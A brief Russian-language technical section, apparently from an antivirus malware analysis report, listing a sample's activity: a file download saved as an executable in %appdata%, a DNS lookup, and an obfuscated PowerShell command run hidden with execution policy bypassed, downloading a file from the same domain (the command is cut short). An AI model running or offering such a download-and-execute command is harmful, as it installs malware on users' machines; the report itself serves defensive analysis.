Техническая информация
- http://www.fapoergol.top/read.php?f=1.gif как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "PO^W^eR^shelL^.eXe -^E^X^ecUtio^NPolIc^y^ B^yPA^s^s ^-NOP^ro^fil^E ^-W^IN^d^OWstYle ^h^i^dde^N (^Ne^W-oBJEct ^sYs^t^EM.neT.webC^l^i^ent^)^.Do^W^nLoA^DfIle^('http://www.fapoergol.t...
- DNS ASK fa###rgol.top
- '<SYSTEM32>\cmd.exe' /C "PO^W^eR^shelL^.eXe -^E^X^ecUtio^NPolIc^y^ B^yPA^s^s ^-NOP^ro^fil^E ^-W^IN^d^OWstYle ^h^i^dde^N (^Ne^W-oBJEct ^sYs^t^EM.neT.webC^l^i^ent^)^.Do^W^nLoA^DfIle^('http://www.fapoergol.t...' (со скрытым окном)